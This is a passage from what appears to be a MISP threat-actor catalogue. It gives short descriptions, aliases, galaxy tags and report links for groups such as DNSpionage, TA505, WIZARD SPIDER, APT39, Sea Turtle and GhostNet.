containing job postings that are used to compromise targets via malicious Microsoft Office documents with embedded macros. The malware utilized by this actor, which we are calling "DNSpionage," supports HTTP and DNS communication with the attackers. In a separate campaign, the attackers used the same IP to redirect the DNS of legitimate .gov and private company domains. During each DNS compromise, the actor carefully generated Let's Encrypt certificates for the redirected domains. These certificates provide X.509 certificates for TLS free of charge to the user. We don't know at this time if the DNS redirections were successful. In this post, we will break down the attackers' methods and show how they used malicious documents to attempt to trick users into opening malicious websites that are disguised as "help wanted" sites for job seekers. Additionally, we will describe the malicious DNS redirection and the timeline of the events.

The tag is: *misp-galaxy:threat-actor="DNSpionage"

DNSpionage is also known as:

- COBALT EDGEBATER

Table 6094. Table References

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<td><a href="https://www.krebsonsecurity.com/tag/dnspionage/">https://www.krebsonsecurity.com/tag/dnspionage/</a></td>
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**DarkVishnya**

Dubbed DarkVishnya, the attacks targeted at least eight banks using readily-available gear such as netbooks or inexpensive laptops, Raspberry Pi mini-computers, or a Bash Bunny - a USB-sized piece hardware for penetration testing purposes that can pose as a keyboard, flash storage, network adapter, or as any serial device.

The tag is: *misp-galaxy:threat-actor="DarkVishnya"

Table 6095. Table References

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**Operation Poison Needles**

What's noteworthy is that according to the introduction on the compromised website of the polyclinic ([http://www.p2f.ru](http://www.p2f.ru)), the institution was established in 1965 and it was founded by the
Presidential Administration of Russia. The multidisciplinary outpatient institution mainly serves the civil servants of the highest executive, legislative, judicial authorities of the Russian Federation, as well as famous figures of science and art. Since it is the first detection of this APT attack by 360 Security on a global scale, we code-named it as “Operation Poison Needles”, considering that the target was a medical institution. Currently, the attribution of the attacker is still under investigation. However, the special background of the polyclinic and the sensitiveness of the group it served both indicate the attack is highly targeted. Simultaneously, the attack occurred at a very sensitive timing of the Kerch Strait Incident, so it also aroused the assumption on the political attribution of the attack.

The tag is: **misp-galaxy:threat-actor="Operation Poison Needles"**

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**GC01**

From November 2017 to October 2018, we attributed 14 campaigns to the GC threat actors that used a specific MaaS provider (hereinafter “the Provider”) offered by a known individual (hereinafter “the Provider Operator”).

The tag is: **misp-galaxy:threat-actor="GC01"**

GC01 is also known as:

- Golden Chickens
- Golden Chickens01
- Golden Chickens 01

GC01 has relationships with:

- similar: **misp-galaxy:threat-actor="GC02"** with **estimative-language:likelihood-probability="likely"**

Table 6097. Table References

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**GC02**

From November 2017 to October 2018, we attributed 14 campaigns to the GC threat actors that used a specific MaaS provider (hereinafter “the Provider”) offered by a known individual (hereinafter “the Provider Operator”).
The tag is: misp-galaxy:threat-actor="GC02"

GC02 is also known as:

- Golden Chickens
- Golden Chickens02
- Golden Chickens 02

GC02 has relationships with:

- similar: misp-galaxy:threat-actor="GC01" with estimative-language:likelihood-probability="likely"

Table 6098. Table References

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Operation Sharpshooter

The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries. Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.

The tag is: misp-galaxy:threat-actor="Operation Sharpshooter"

Operation Sharpshooter has relationships with:

- similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"

Table 6099. Table References

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3592
TA505, the name given by Proofpoint, has been in the cybercrime business for at least four years. This is the group behind the infamous Dridex banking trojan and Locky ransomware, delivered through malicious email campaigns via Necurs botnet. Other malware associated with TA505 include Philadelphia and GlobeImposter ransomware families.

The tag is: `misp-galaxy:threat-actor="TA505"`

TA505 is also known as:

- SectorJ04 Group
- GRACEFUL SPIDER
- GOLD TAHOE
- Dudear

Table 6100. Table References

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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.proofpoint.com/sites/default/files/ta505_timeline_final4_0.png">https://www.proofpoint.com/sites/default/files/ta505_timeline_final4_0.png</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/gold-tahoe">https://www.secureworks.com/research/threat-profiles/gold-tahoe</a></td>
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</table>
GRIM SPIDER

GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell. The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past. Similar to Samas and BitPaymer, Ryuk is specifically used to target enterprise environments. Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release. Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors. However, Ryuk is only used by GRIM SPIDER and, unlike Hermes, Ryuk has only been used to target enterprise environments. Since Ryuk’s appearance in August, the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD. Grim Spider is reportedly associated with Lunar Spider and Wizard Spider.

The tag is: misp-galaxy:threat-actor="GRIM SPIDER"

GRIM SPIDER is also known as:

• GOLD ULRICK

Table 6101. Table References

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WIZARD SPIDER

Wizard Spider is reportedly associated with Grim Spider and Lunar Spider. The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware. This group represents a growing criminal enterprise of which GRIM SPIDER appears to be a subset. The LUNAR SPIDER threat group is the Eastern European-based operator and developer of the commodity banking malware called BokBot (aka IcedID), which was first observed in April 2017. The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud, through the use of webinjects and a malware distribution function. GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell. The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past.
The tag is: misp-galaxy:threat-actor=“WIZARD SPIDER”

WIZARD SPIDER is also known as:

- TEMP.MixMaster
- GOLD BLACKBURN

Table 6102. Table References

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<tr>
<td><a href="https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/">https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/gold-ulrick">https://www.secureworks.com/research/threat-profiles/gold-ulrick</a></td>
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**MUMMY SPIDER**

MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo. First observed in mid-2014, this malware shared code with the Bugat (aka Feodo) banking Trojan. However, MUMMY SPIDER swiftly developed the malware’s capabilities to include an RSA key exchange for command and control (C2) communication and a modular architecture. MUMMY SPIDER does not follow typical criminal behavioral patterns. In particular, MUMMY SPIDER usually conducts attacks for a few months before ceasing operations for a period of between three and 12 months, before returning with a new variant or version. After a 10 month hiatus, MUMMY SPIDER returned Emotet to operation in December 2016 but the latest variant is not deploying a banking Trojan module with web injects, it is currently acting as a ‘loader’ delivering other malware packages. The primary modules perform reconnaissance on victim machines, drop freeware tools for credential collection from web browsers and mail clients and a spam plugin for self-propagation. The malware is also issuing commands to download and
execute other malware families such as the banking Trojans Dridex and Qakbot. MUMMY SPIDER advertised Emotet on underground forums until 2015, at which time it became private. Therefore, it is highly likely that Emotet is operate

The tag is: misp-galaxy:threat-actor="MUMMY SPIDER"

MUMMY SPIDER is also known as:

- TA542
- GOLD CRESTWOOD

Table 6103. Table References

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<td><a href="https://www.secureworks.com/research/threat-profiles/gold-crestwood">https://www.secureworks.com/research/threat-profiles/gold-crestwood</a></td>
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STARDUST CHOLLIMA

Open-source reporting has claimed that the Hermes ransomware was developed by the North Korean group STARDUST CHOLLIMA (activities of which have been public reported as part of the “Lazarus Group”), because Hermes was executed on a host during the SWIFT compromise of FEIB in October 2017.

The tag is: misp-galaxy:threat-actor="STARDUST CHOLLIMA"

Table 6104. Table References

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Cold River

In short, “Cold River” is a sophisticated threat (actor) that utilizes DNS subdomain hijacking, certificate spoofing, and covert tunneled command and control traffic in combination with complex and convincing lure documents and custom implants.

The tag is: misp-galaxy:threat-actor="Cold River"
Cold River is also known as:

- Nahr Elbard
- Nahr el bared

**Silence group**

A relatively new threat actor that's been operating since mid-2016 Group-IB has exposed the attacks committed by Silence cybercriminal group. While the gang had previously targeted Russian banks, Group-IB experts also have discovered evidence of the group's activity in more than 25 countries worldwide. Group-IB has published its first detailed report on tactics and tools employed by Silence. Group-IB security analysts' hypothesis is that at least one of the gang members appears to be a former or current employee of a cyber security company. The confirmed damage from Silence activity is estimated at 800 000 USD. Silence is a group of Russian-speaking hackers, based on their commands language, the location of infrastructure they used, and the geography of their targets (Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan). Although phishing emails were also sent to bank employees in Central and Western Europe, Africa, and Asia). Furthermore, Silence used Russian words typed on an English keyboard layout for the commands of the employed backdoor. The hackers also used Russian-language web hosting services.

The tag is: `misp-galaxy:threat-actor="Silence group"`

Silence group is also known as:

- Silence
- Silence APT group
- WHISPER SPIDER

**APT39**

APT39 was created to bring together previous activities and methods used by this actor, and its activities largely align with a group publicly referred to as "Chafer." However, there are differences in what has been publicly reported due to the variances in how organizations track activity. APT39 primarily leverages the SEAWEED and CACHEMONEY backdoors along with a specific variant of the
POWBAT backdoor. While APT39's targeting scope is global, its activities are concentrated in the Middle East. APT39 has prioritized the telecommunications sector, with additional targeting of the travel industry and IT firms that support it and the high-tech industry.

The tag is: misp-galaxy:threat-actor="APT39"

APT39 is also known as:

- APT 39
- Chafer
- REMIX KITTEN
- COBALT HICKMAN

### Table 6107. Table References

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**Siesta**

FireEye recently looked deeper into the activity discussed in TrendMicro’s blog and dubbed the “Siesta” campaign. The tools, modus operandi, and infrastructure used in the campaign present two possibilities: either the Chinese cyber-espionage unit APT1 is perpetrating this activity, or another group is using the same tactics and tools as the legacy APT1. The Siesta campaign reinforces the fact that analysts and network defenders should remain on the lookout for known, public indicators and for shared attributes that allow security experts to detect multiple actors with one signature.

The tag is: misp-galaxy:threat-actor="Siesta"

### Table 6108. Table References

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</table>
Gallmaker

Symantec researchers have uncovered a previously unknown attack group that is targeting government and military targets, including several overseas embassies of an Eastern European country, and military and defense targets in the Middle East. This group eschews custom malware and uses living off the land (LotL) tactics and publicly available hack tools to carry out activities that bear all the hallmarks of a cyber espionage campaign. The group, which we have given the name Gallmaker, has been operating since at least December 2017, with its most recent activity observed in June 2018.

The tag is: misp-galaxy:threat-actor="Gallmaker"

Table 6109. Table References

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<tr>
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BOSS SPIDER

Throughout 2018, CrowdStrike Intelligence tracked BOSS SPIDER as it regularly updated Samas ransomware and received payments to known Bitcoin (BTC) addresses. This consistent pace of activity came to an abrupt halt at the end of November 2018 when the U.S. DoJ released an indictment for Iran-based individuals Faramarz Shahi Savandi and Mohammad Mehdi Shah Mansouri, alleged members of the group.

The tag is: misp-galaxy:threat-actor="BOSS SPIDER"

BOSS SPIDER is also known as:

• GOLD LOWELL

Table 6110. Table References

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<td><a href="https://www.secureworks.com/research/threat-profiles/gold-lowell">https://www.secureworks.com/research/threat-profiles/gold-lowell</a></td>
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PINCHY SPIDER

First observed in January 2018, GandCrab ransomware quickly began to proliferate and receive regular updates from its developer, PINCHY SPIDER, which over the course of the year established a RaaS operation with a dedicated set of affiliates. CrowdStrike Intelligence has recently observed...
PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments, using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams. This change in tactics makes PINCHY SPIDER and its affiliates the latest eCrime adversaries to join the growing trend of targeted, low-volume/high-return ransomware deployments known as “big game hunting.” PINCHY SPIDER is the criminal group behind the development of the ransomware most commonly known as GandCrab, which has been active since January 2018. PINCHY SPIDER sells access to use GandCrab ransomware under a partnership program with a limited number of accounts. The program is operated with a 60-40 split in profits (60 percent to the customer), as is common among eCrime actors, but PINCHY SPIDER is also willing to negotiate up to a 70-30 split for “sophisticated” customers.

The tag is: misp-galaxy:threat-actor="PINCHY SPIDER"

Table 6111. Table References

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**GURU SPIDER**

Early in 2018, CrowdStrike Intelligence observed GURU SPIDER supporting the distribution of multiple crimeware families through its flagship malware loader, Quant Loader.

The tag is: misp-galaxy:threat-actor="GURU SPIDER"

Table 6112. Table References

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**SALTY SPIDER**

Beginning in January 2018 and persisting through the first half of the year, CrowdStrike Intelligence observed SALTY SPIDER, developer and operator of the long-running Sality botnet, distribute malware designed to target cryptocurrency users.

The tag is: misp-galaxy:threat-actor="SALTY SPIDER"

Table 6113. Table References

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Nomad Panda

In the first quarter of 2018, CrowdStrike Intelligence identified NOMAD PANDA activity targeting Central Asian nations with exploit documents built with the 8.t tool.

The tag is: *misp-galaxy:threat-actor="Nomad Panda"

---

Flash Kitten

This suspected Iran-based adversary conducted long-running SWC campaigns from December 2016 until public disclosure in July 2018. Like other Iran-based actors, the target scope for FLASH KITTEN appears to be focused on the MENA region.

The tag is: *misp-galaxy:threat-actor="Flash Kitten"

---

SKELETON SPIDER

According to CrowdStrike, this actor is using FrameworkPOS, potentially buying access through Dridex infections.

The tag is: *misp-galaxy:threat-actor="SKELETON SPIDER"

---

TINY SPIDER

According to CrowdStrike, this actor is using TinyLoader and TinyPOS, potentially buying access through Dridex infections.

The tag is: *misp-galaxy:threat-actor="TINY SPIDER"
LUNAR SPIDER

According to CrowdStrike, this actor is using BokBok/IcedID, potentially buying distribution through Emotet infections. On March 17, 2019, CrowdStrike Intelligence observed the use of a new BokBot (developed and operated by LUNAR SPIDER) proxy module in conjunction with TrickBot (developed and operated by WIZARD SPIDER), which may provide WIZARD SPIDER with additional tools to steal sensitive information and conduct fraudulent wire transfers. This activity also provides further evidence to support the existence of a flourishing relationship between these two actors. Lunar Spider is reportedly associated with Grim Spider and Wizard Spider.

The tag is: misp-galaxy:threat-actor="LUNAR SPIDER"

LUNAR SPIDER is also known as:

- GOLD SWATHMORE

Table 6118. Table References

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<tr>
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<td><a href="https://www.secureworks.com/research/threat-profiles/gold-swathmore">https://www.secureworks.com/research/threat-profiles/gold-swathmore</a></td>
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</table>

RATPAK SPIDER

In July 2018, the source code of Pegasus, RATPAK SPIDER's malware framework, was anonymously leaked. This malware has been linked to the targeting of Russia's financial sector. Associated malware, Buhtrap, which has been leaked previously, was observed this year in connection with SWC campaigns that also targeted Russian users.

The tag is: misp-galaxy:threat-actor="RATPAK SPIDER"

Table 6119. Table References

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Operation Kabar Cobra

The tag is: misp-galaxy:threat-actor="Operation Kabar Cobra"

Table 6120. Table References

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APT-C-36

Since April 2018, an APT group (Blind Eagle, APT-C-36) suspected coming from South America carried out continuous targeted attacks against Colombian government institutions as well as important corporations in financial sector, petroleum industry, professional manufacturing, etc.

The tag is: misp-galaxy:threat-actor="APT-C-36"

APT-C-36 is also known as:

- Blind Eagle

Table 6121. Table References

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IRIDIUM

Resecurity’s research indicates that the attack on Parliament is a part of a multi-year cyberespionage campaign orchestrated by a nation-state actor whom we are calling IRIDIUM. This actor targets sensitive government, diplomatic, and military resources in the countries comprising the Five Eyes intelligence alliance (which includes Australia, Canada, New Zealand, the United Kingdom and the United States)

The tag is: misp-galaxy:threat-actor="IRIDIUM"

Table 6122. Table References

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SandCat

SandCat, on the other hand, is a group that was discovered more recently by Kaspersky. One of the Windows vulnerabilities patched by Microsoft in December had been exploited by both FruityArmor and SandCat in attacks targeting the Middle East and Africa. SandCat has been using FinFisher/FinSpy spyware and CHAINSHOT, a piece of malware analyzed earlier this year by Palo Alto Networks. The group has also used the CVE-2018-8589 and CVE-2018-8611 Windows
vulnerabilities in its attacks, both of which had a zero-day status when Microsoft released fixes.

The tag is: `misp-galaxy:threat-actor="SandCat"`

### Operation Comando

Operation Comando is a pure cybercrime campaign, possibly with Brazilian origin, with a concrete and persistent focus on the hospitality sector, which proves how a threat actor can be successful in pursuing its objectives while maintaining a cheap budget. The use of DDNS services, publicly available remote access tools, and having a minimum knowledge on software development (in this case VB.NET) has been enough for running a campaign lasting month, and potentially gathering credit card information and other possible data.

The tag is: `misp-galaxy:threat-actor="Operation Comando"`

### APT-C-27

On March 17, 2019, 360 Threat Intelligence Center captured a target attack sample against the Middle East by exploiting WinRAR vulnerability (CVE-2018-20250[6]), and it seems that the attack is carried out by the Goldmouse APT group (APT-C-27). There is a decoy Word document inside the archive regarding terrorist attacks to lure the victim into decompressing. When the archive gets decompressed on the vulnerable computer, the embedded njRAT backdoor (Telegram Desktop.exe) will be extracted to the startup folder and then triggered into execution if the victim restarts the computer or performs re-login. After that, the attacker is capable to control the compromised device.

The tag is: `misp-galaxy:threat-actor="APT-C-27"`

APT-C-27 is also known as:

- GoldMouse
**Operation ShadowHammer**

Newly discovered supply chain attack that leveraged ASUS Live Update software. The goal of the attack was to surgically target an unknown pool of users, which were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack. Of course, there might be other samples out there with different MAC addresses in their list.

The tag is: `misp-galaxy:threat-actor="Operation ShadowHammer"`

**Table 6126. Table References**

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<td><a href="https://securelist.com/operation-shadowhammer/89992/">https://securelist.com/operation-shadowhammer/89992/</a></td>
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</table>

**Whitefly**

In July 2018, an attack on Singapore’s largest public health organization, SingHealth, resulted in a reported 1.5 million patient records being stolen. Until now, nothing was known about who was responsible for this attack. Symantec researchers have discovered that this attack group, which we call Whitefly, has been operating since at least 2017, has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information.

The tag is: `misp-galaxy:threat-actor="Whitefly"`

**Table 6127. Table References**

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**Sea Turtle**

This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the internet. That trust and the stability of the DNS system as a whole drives the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system.
Silent Librarian

Last Friday, Deputy Attorney General Rod Rosenstein announced the indictment of nine Iranians who worked for an organization named the Mabna Institute. According to prosecutors, the defendants stole more than 31 terabytes of data from universities, companies, and government agencies around the world. The cost to the universities alone reportedly amounted to approximately $3.4 billion. The information stolen from these universities was used by the Islamic Revolutionary Guard Corps (IRGC) or sold for profit inside Iran. PhishLabs has been tracking this same threat group since late-2017, designating them Silent Librarian. Since discovery, we have been working with the FBI, ISAC partners, and other international law enforcement agencies to help understand and mitigate these attacks.

Silent Librarian is also known as:

- COBALT DICKENS
- Mabna Institute
- TA407
APT31

FireEye characterizes APT31 as an actor specialized on intellectual property theft, focusing on data and projects that make a particular organization competitive in its field. Based on available data (April 2016), FireEye assesses that APT31 conducts network operations at the behest of the Chinese Government. Also according to Crowdstrike, this adversary is suspected of continuing to target upstream providers (e.g., law firms and managed service providers) to support additional intrusions against high-profile assets. In 2018, CrowdStrike observed this adversary using spear-phishing, URL “web bugs” and scheduled tasks to automate credential harvesting.

The tag is: *misp-galaxy:threat-actor="APT31"*

APT31 is also known as:

- APT 31
- ZIRCONIUM
- JUDGMENT PANDA
- BRONZE VINEWOOD

*Table 6130. Table References*

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<thead>
<tr>
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<tbody>
<tr>
<td><a href="https://duo.com/decipher/apt-groups-moving-down-the-supply-chain">https://duo.com/decipher/apt-groups-moving-down-the-supply-chain</a></td>
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Blackgear

BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years. Multiple papers and talks have been released covering this campaign, which used the ELIRKS backdoor when it was first discovered in 2012. It is known for using blogs and microblogging services to hide the location of its actual command-and-control (C&C) servers. This allows an attacker to change the C&C server used quickly by changing the information in these posts. Like most campaigns, BLACKGEAR has evolved over time. Our research indicates that it has started targeting Japanese users. Two things led us to this conclusion: first, the fake documents that are used as part of its infection routines are now in Japanese. Secondly, it is now using blogging sites and microblogging services based in Japan for its C&C activity.

The tag is: misp-galaxy:threat-actor="Blackgear"

Blackgear is also known as:

• Topgear
• Comnie
• BLACKGEAR

Table 6131. Table References

Links


**BlackOasis**

BlackOasis is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. A group known by Microsoft as NEOXYMIUM is reportedly associated closely with BlackOasis operations, but evidence that the group names are aliases has not been identified.

The tag is: `misp-galaxy:threat-actor="BlackOasis"`

**Table 6132. Table References**

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<td><a href="https://attack.mitre.org/groups/G0063/">https://attack.mitre.org/groups/G0063/</a></td>
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**BlackTech**

BlackTech is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong. Based on the mutexes and domain names of some of their C&C servers, BlackTech's campaigns are likely designed to steal their target's technology. Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns: PLEAD, Shrouded Crossbow, and of late, Waterbeak. PLEAD is an information theft campaign with a penchant for confidential documents. Active since 2012, it has so far targeted Taiwanese government agencies and private organizations. PLEAD's toolset includes the self-named PLEAD backdoor and the DRIGO exfiltration tool. PLEAD uses spear-phishing emails to deliver and install their backdoor, either as an attachment or through links to cloud storage services. Some of the cloud storage accounts used to deliver PLEAD are also used as drop off points for exfiltrated documents stolen by DRIGO. PLEAD actors use a router scanner tool to scan for vulnerable routers, after which the attackers will enable the router's VPN feature then register a machine as virtual server. This virtual server will be used either as a C&C server or an HTTP server that delivers PLEAD malware to their targets.

The tag is: `misp-galaxy:threat-actor="BlackTech"`

BlackTech is also known as:

- CIRCUIT PANDA
- Temp.Overboard
- HUAPI
- Palmerworm

**Table 6133. Table References**

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FIN5

FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian.

The tag is: `misp-galaxy:threat-actor="FIN5"`

Table 6134. Table References

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<tr>
<td><a href="https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645">https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645</a>?</td>
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<td><a href="https://attack.mitre.org/groups/G0053/">https://attack.mitre.org/groups/G0053/</a></td>
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FIN1

FireEye first identified this activity during a recent investigation at an organization in the financial industry. They identified the presence of a financially motivated threat group that they track as FIN1, whose activity at the organization dated back several years. The threat group deployed numerous malicious files and utilities, all of which were part of a malware ecosystem referred to as ‘Nemesis’ by the malware developer(s), and used this malware to access the victim environment and steal cardholder data. FIN1, which may be located in Russia or a Russian-speaking country based on language settings in many of their custom tools, is known for stealing data that is easily monetized from financial services organizations such as banks, credit unions, ATM operations, and financial transaction processing and financial business services companies.

The tag is: `misp-galaxy:threat-actor="FIN1"`

Table 6135. Table References

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<td><a href="https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html">https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html</a></td>
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</table>
FIN10

FireEye has observed multiple targeted intrusions occurring in North America — predominately in Canada — dating back to at least 2013 and continuing through at least 2016, in which the attacker(s) have compromised organizations' networks and sought to monetize this illicit access by exfiltrating sensitive data and extorting victim organizations. In some cases, when the extortion demand was not met, the attacker(s) destroyed production Windows systems by deleting critical operating system files and then shutting down the impacted systems. Based on near parallel TTPs used by the attacker(s) across these targeted intrusions, we believe these clusters of activity are linked to a single, previously unobserved actor or group that we have dubbed FIN10.

The tag is: misp-galaxy:threat-actor="FIN10"

Table 6136. Table References

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<td><a href="https://attack.mitre.org/groups/G0051/">https://attack.mitre.org/groups/G0051/</a></td>
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GhostNet

Cyber espionage is an issue whose time has come. In this second report from the Information Warfare Monitor, we lay out the findings of a 10-month investigation of alleged Chinese cyber spying against Tibetan institutions. The investigation, consisting of fieldwork, technical scouting, and laboratory analysis, discovered a lot more. The investigation ultimately uncovered a network of over 1,295 infected hosts in 103 countries. Up to 30% of the infected hosts are considered high-value targets and include computers located at ministries of foreign affairs, embassies, international organizations, news media, and NGOs. The Tibetan computer systems we manually investigated, and from which our investigations began, were conclusively compromised by multiple infections that gave attackers unprecedented access to potentially sensitive information.

Attacks on the Dalai Lama's Private Office The OHHDL started to suspect it was under surveillance while setting up meetings be-tween His Holiness and foreign dignitaries. They sent an email invitation on behalf of His Holiness to a foreign diplomat, but before they could follow it up with a courtesy telephone call, the diplomat's office was contacted by the Chinese government and warned not to go ahead with the meeting. The Tibetans wondered whether a computer compromise might be the explanation; they called ONI Asia who called us. (Until May 2008, the first author was employed on a studentship funded by the OpenNet Initiative and the second author was a principal investigator for ONI.)

The tag is: misp-galaxy:threat-actor="GhostNet"

GhostNet is also known as:

- Snooping Dragon

Table 6137. Table References

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GozNym

IBM X-Force Research uncovered a Trojan hybrid spawned from the Nymaim and Gozi ISFB malware. It appears that the operators of Nymaim have recompiled its source code with part of the Gozi ISFB source code, creating a combination that is being actively used in attacks against more than 24 U.S. and Canadian banks, stealing millions of dollars so far. X-Force named this new hybrid GozNym. The new GozNym hybrid takes the best of both the Nymaim and Gozi ISFB malware to create a powerful Trojan. From the Nymaim malware, it leverages the dropper's stealth and persistence; the Gozi ISFB parts add the banking Trojan's capabilities to facilitate fraud via infected Internet browsers. The end result is a new banking Trojan in the wild.

The tag is: `misp-galaxy:threat-actor="GozNym"`

Table 6138. Table References

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<tr>
<td><a href="https://threatpost.com/attackers-behind-goznym-trojan-set-sights-on-europe/117647/">https://threatpost.com/attackers-behind-goznym-trojan-set-sights-on-europe/117647/</a></td>
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<tr>
<td><a href="https://threatpost.com/goznym-banking-trojan-targeting-german-banks/120075/">https://threatpost.com/goznym-banking-trojan-targeting-german-banks/120075/</a></td>
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Group5

A threat actor using Iranian-language tools, Iranian hosting companies, operating from the Iranian IP space at times was observed targeting the Syrian opposition in an elaborately staged malware operation, Citizen Lab researchers reveal. The operation was first noticed in late 2015, when a member of the Syrian opposition flagged a suspicious email containing a PowerPoint slideshow, which led researchers to a watering hole website with malicious programs, malicious PowerPoint files, and Android malware. The threat actor was targeting Windows and Android devices of well-connected individuals in the Syrian opposition, researchers discovered. They called the actor Group5, because it targets Syrian opposition after regime-linked malware groups, the Syrian Electronic Army, ISIS (also known as the Islamic State or ISIL), and a group linked to Lebanon did the same in the past.

The tag is: `misp-galaxy:threat-actor="Group5"`

Table 6139. Table References

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<tr>
<td><a href="https://www.securityweek.com/iranian-actor-group5-targeting-syrian-opposition">https://www.securityweek.com/iranian-actor-group5-targeting-syrian-opposition</a></td>
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McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our analysts have named this Operation Honeybee, based on the names of the malicious documents used in the attacks. Advanced Threat Research analysts have also discovered malicious documents authored by the same actor that indicate a tactical shift. These documents do not contain the typical lures by this actor, instead using Word compatibility messages to entice victims into opening them. The Advanced Threat Research team also observed a heavy concentration of the implant in Vietnam from January 15–17.

The tag is: *misp-galaxy:threat-actor="Honeybee"*

### Lucky Cat

A series of attacks, targeting both Indian military research and south Asian shipping organizations, demonstrate the minimum level of effort required to successfully compromise a target and steal sensitive information. The attackers use very simple malware, which required little development time or skills, in conjunction with freely available Web hosting, to implement a highly effective attack. It is a case of the attackers obtaining a maximum return on their investment. The attack shows how an intelligent attacker does not need to be particularly technically skilled in order to steal the information they are after. The attack begins, as is often the case, with an email sent to the victim. A malicious document is attached to the email, which, when loaded, activates the malware. The attackers use tailored emails to encourage the victim to open the email. For example, one email sent to an academic claimed to be a call for papers for a conference (CFP). The vast majority of the victims were based in India, with some in Malaysia. The victim industry was mostly military research and also shipping based in the Arabian and South China seas. In some instances the attackers appeared to have a clear goal, whereby specific files were retrieved from certain compromised computers. In other cases, the attackers used more of a ‘shotgun’ like approach, copying every file from a computer. Military technologies were obviously the focus of one particular attack with what appeared to be source code stolen. 45 different attacker IP addresses were observed. Out of those, 43 were within the same IP address range based in Sichuan province, China. The remaining two were based in South Korea. The pattern of attacker connections implies that the IP addresses are being used as a VPN, probably in an attempt to render the attackers anonymous.

The attacks have been active from at least April 2011 up to February 2012. The attackers are intelligent and focused, employing the minimum amount of work necessary for the maximum gain. They do not use zero day exploits or complicated threats, instead they rely on effective social engineering and lax security measures on the part of the victims.
RTM

There are several groups actively and profitably targeting businesses in Russia. A trend that we have seen unfold before our eyes lately is these cybercriminals’ use of simple backdoors to gain a foothold in their targets' networks. Once they have this access, a lot of the work is done manually, slowly getting to understand the network layout and deploying custom tools the criminals can use to steal funds from these entities. Some of the groups that best exemplify these trends are Buhtrap, Cobalt and Corkow. The group discussed in this white paper is part of this new trend. We call this new group RTM; it uses custom malware, written in Delphi, that we cover in detail in later sections. The first trace of this tool in our telemetry data dates back to late 2015. The group also makes use of several different modules that they deploy where appropriate to their targets. They are interested in users of remote banking systems (RBS), mainly in Russia and neighboring countries.

Shadow Network

